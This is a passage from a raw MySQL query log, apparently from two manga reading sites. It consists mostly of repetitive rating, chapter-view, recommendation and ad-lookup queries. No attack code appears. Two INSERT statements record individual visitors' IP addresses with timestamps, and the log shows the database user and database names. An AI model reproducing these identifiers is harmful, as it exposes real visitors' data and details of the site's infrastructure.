= '246' order by created desc 330655169 Quit 330655170 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655170 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '215' order by created desc 330655170 Quit 330655171 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655171 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '275' order by created desc 330655171 Quit 330655172 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655172 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '287' order by created desc 330655172 Quit 330655173 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655173 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '195' order by created desc 330655173 Quit 330655174 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655174 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '212' order by created desc 330655174 Quit 330655175 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655175 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '280' order by created desc 330655175 Quit 330655176 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655176 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '278' order by created desc 330655176 Quit 330655177 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655177 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '330' order by created desc 330655177 Quit 330655178 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655178 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '229' order by created desc 330655178 Quit 330655179 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655179 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '186' order by created desc 330655179 Quit 330655180 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655180 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '326' order by created desc 330655180 Quit 330655181 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655181 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '256' order by created desc 330655181 Quit 330655182 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655182 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '270' order by created desc 330655182 Quit 330655183 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655183 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '114' order by created desc 330655183 Quit 330655184 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655184 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '294' order by created desc 330655184 Quit 330655185 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655185 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '276' order by created desc 330655185 Quit 330655186 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655186 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '320' order by created desc 330655186 Quit 330655187 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655187 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '250' order by created desc 330655187 Quit 330655188 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655188 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '216' order by created desc 330655188 Quit 330655189 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655189 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '277' order by created desc 330655189 Quit 330655190 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655190 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '236' order by created desc 330655190 Quit 330655191 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655191 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '358' order by created desc 330655191 Quit 330655192 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655192 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '188' order by created desc 330655192 Quit 330655193 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655193 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '272' order by created desc 330655193 Quit 330655194 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655194 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '118' order by created desc 330655194 Quit 330655195 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655195 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '262' order by created desc 330655195 Quit 330655196 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655196 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '28' order by created desc 330655196 Quit 330655197 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655197 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '371' order by created desc 330655197 Quit 330655198 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655198 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '281' order by created desc 330655198 Quit 330655199 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655199 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '254' order by created desc 330655199 Quit 330655200 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655200 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '323' order by created desc 330655200 Quit 330655201 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655201 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '328' order by created desc 330655201 Quit 330655202 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655202 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '361' order by created desc 330655202 Quit 330655203 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655203 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '238' order by created desc 330655203 Quit 330655204 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655204 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '347' order by created desc 330655204 Quit 330655205 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655205 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '1' order by created desc 330655205 Quit 330655206 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655206 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '286' order by created desc 330655206 Quit 330655207 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655207 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '255' order by created desc 330655207 Quit 330655208 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655208 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '372' order by created desc 330655208 Quit 330655209 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655209 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '315' order by created desc 330655209 Quit 330655210 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655210 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '189' order by created desc 330655210 Quit 330655211 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655211 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '313' order by created desc 330655211 Quit 330655212 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655212 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '325' order by created desc 330655212 Quit 330655213 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655213 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '260' order by created desc 330655213 Quit 330655214 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655214 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '348' order by created desc 330655214 Quit 330655215 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655215 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '285' order by created desc 330655215 Quit 330655216 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655216 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '319' order by created desc 330655216 Quit 330655217 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655217 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '306' order by created desc 330655217 Quit 330655218 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655218 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '283' order by created desc 330655218 Quit 330655219 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655219 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '355' order by created desc 330655219 Quit 330655220 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655220 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '342' order by created desc 330655220 Quit 330655221 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655221 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '264' order by created desc 330655221 Quit 330655222 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655222 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '302' order by created desc 330655222 Quit 330655223 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655223 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '182' order by created desc 330655223 Quit 330655224 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655224 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '274' order by created desc 330655224 Quit 330655225 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655225 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '329' order by created desc 330655225 Quit 330655226 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655226 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '279' order by created desc 330655226 Quit 330655227 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655227 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '314' order by created desc 330655227 Quit 330655228 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655228 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '332' order by created desc 330655228 Quit 330655229 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655229 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '351' order by created desc 330655229 Quit 330655230 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655230 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '289' order by created desc 330655230 Quit 330655231 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655231 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '343' order by created desc 330655231 Quit 330655232 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655232 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '310' order by created desc 330655232 Quit 330655233 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655233 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '356' order by created desc 330655233 Quit 330655234 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655234 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '301' order by created desc 330655234 Quit 330655235 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655235 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '273' order by created desc 330655235 Quit 330655236 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655236 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '300' order by created desc 330655236 Quit 330655237 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655237 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '263' order by created desc 330655237 Quit 330655238 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655238 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '318' order by created desc 330655238 Quit 330655239 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655239 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '317' order by created desc 330655239 Quit 330655240 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655240 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '382' order by created desc 330655240 Quit 330655241 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655241 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '295' order by created desc 330655241 Quit 330655242 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655242 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '373' order by created desc 330655242 Quit 330655243 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655243 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '245' order by created desc 330655243 Quit 330655244 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655244 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '247' order by created desc 330655244 Quit 330655245 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655245 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '337' order by created desc 330655245 Quit 330655246 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655246 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '299' order by created desc 330655246 Quit 330655247 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655247 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '335' order by created desc 330655247 Quit 330655248 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655248 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '90' order by created desc 330655248 Quit 330655249 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655249 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '265' order by created desc 330655249 Quit 330655250 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655250 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '258' order by created desc 330655250 Quit 330655251 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655251 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '380' order by created desc 330655251 Quit 330655252 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655252 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '334' order by created desc 330655252 Quit 330655253 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655253 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '336' order by created desc 330655253 Quit 330655254 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655254 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '304' order by created desc 330655254 Quit 330655255 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655255 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '297' order by created desc 330655255 Quit 330655256 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655256 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '340' order by created desc 330655256 Quit 330655257 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655257 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '341' order by created desc 330655257 Quit 330655258 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655258 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '374' order by created desc 330655258 Quit 330655259 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655259 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '367' order by created desc 330655259 Quit 330655260 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655260 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '344' order by created desc 330655260 Quit 330655261 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655261 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '352' order by created desc 330655261 Quit 330655262 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655262 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '357' order by created desc 330655262 Quit 330655263 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655263 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '354' order by created desc 330655263 Quit 330655264 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655264 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '386' order by created desc 330655264 Quit 330655265 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655265 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '333' order by created desc 330655265 Quit 330655266 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655266 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '353' order by created desc 330655266 Quit 330655267 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655267 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '350' order by created desc 330655267 Quit 330655268 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655268 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '376' order by created desc 330655268 Quit 330655269 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655269 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '381' order by created desc 330655269 Quit 330655270 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655270 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '346' order by created desc 330655270 Quit 330655271 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655271 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '309' order by created desc 330655271 Quit 330655272 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655272 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '316' order by created desc 330655272 Quit 330655273 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655273 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '384' order by created desc 330655273 Quit 330655274 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655274 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '291' order by created desc 330655274 Quit 330655275 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655275 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '359' order by created desc 330655275 Quit 330655276 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655276 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '377' order by created desc 330655276 Quit 330655277 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655277 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '378' order by created desc 330655277 Quit 330655278 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655278 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '282' order by created desc 330655278 Quit 330655279 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655279 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '345' order by created desc 330655279 Quit 330655280 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655280 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '296' order by created desc 330655280 Quit 330655281 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655281 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '360' order by created desc 330655281 Quit 330655282 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655282 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '383' order by created desc 330655282 Quit 330655283 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655283 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '375' order by created desc 330655283 Quit 330655284 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655284 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '305' order by created desc 330655284 Quit 330655285 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655285 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '385' order by created desc 330655285 Quit 330655286 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655286 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '369' order by created desc 330655286 Quit 330655287 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655287 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '387' order by created desc 330655287 Quit 330655288 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655288 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '362' order by created desc 330655288 Quit 330655289 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655289 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '388' order by created desc 330655289 Quit 330655290 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655290 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '364' order by created desc 330655290 Quit 330655291 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655291 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '389' order by created desc 330655291 Quit 330655292 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655292 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '365' order by created desc 330655292 Quit 330655293 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655293 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '379' order by created desc 330655293 Quit 330655294 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655294 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '370' order by created desc 330655294 Quit 330655295 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655296 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655296 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '390' order by created desc 330655296 Quit 330655297 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655295 Quit 330655297 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '17022' 330655297 Quit 330655298 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655298 Query select * FROM chapters where id = '17022' 330655298 Quit 330655299 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655299 Query select * FROM chapters where manga_id = '197' order by id desc 330655299 Quit 330655300 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655300 Query Update chapters set view=view+1 where id = '17022' 330655300 Quit 330655301 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655301 Query select * FROM chapters where id = '17022' 330655302 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655301 Quit 330655302 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '17022' 330655302 Quit 330655303 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655303 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('197', '17022', '2409:40d5:100e:a11c:8000::', 'mangacherri.com', '2026-02-26 03:29:42', '2026-02-26 03:29:42') 330655303 Quit 330655304 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655304 Query select * FROM chapter_images where chapter_id = '17022' 330655304 Quit 330655305 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655305 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '197' and m.active = 1 330655305 Quit 330655306 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655306 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='197' and m.active = 1 AND (genres like '%Comedy%' OR genres like '%Romance%' OR genres like '%Shoujo%') ORDER BY RAND() limit 10 330655307 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330655308 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330655307 Quit 330655308 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '1421' and m.active = 1 330655308 Quit 330655309 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330655309 Query select * FROM chapters where id = '1421' 330655309 Quit 330655310 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330655310 Query select * FROM chapters where manga_id = '88' order by display_priority ASC, id desc 330655310 Quit 330655311 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330655311 Query Update chapters set view=view+1 where id = '1421' 330655311 Quit 330655312 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330655312 Query select * FROM chapters where id = '1421' 330655312 Quit 330655313 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330655313 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '1421' and m.active = 1 330655313 Quit 330655314 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330655314 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('88', '1421', '104.249.72.22', 'mangaberri.com', '2026-02-26 03:29:42', '2026-02-26 03:29:42') 330655314 Quit 330655315 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330655315 Query select * FROM chapter_images where chapter_id = '1421' 330655315 Quit 330655316 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330655316 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '88' and m.active = 1 330655316 Quit 330655317 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330655317 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='88' and m.active = 1 AND (genres like '%Action%' OR genres like '%Adventure%' OR genres like '%Seinen%' OR genres like '%Super Power%' OR genres like '%Supernatural%') ORDER BY RAND() limit 10 330655317 Quit 330655318 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330655319 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330655318 Quit 330655319 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330655319 Quit 330655320 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330655321 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330655320 Quit 330655321 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330655321 Quit 330655322 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330655323 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330655323 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330655322 Quit 330655323 Quit 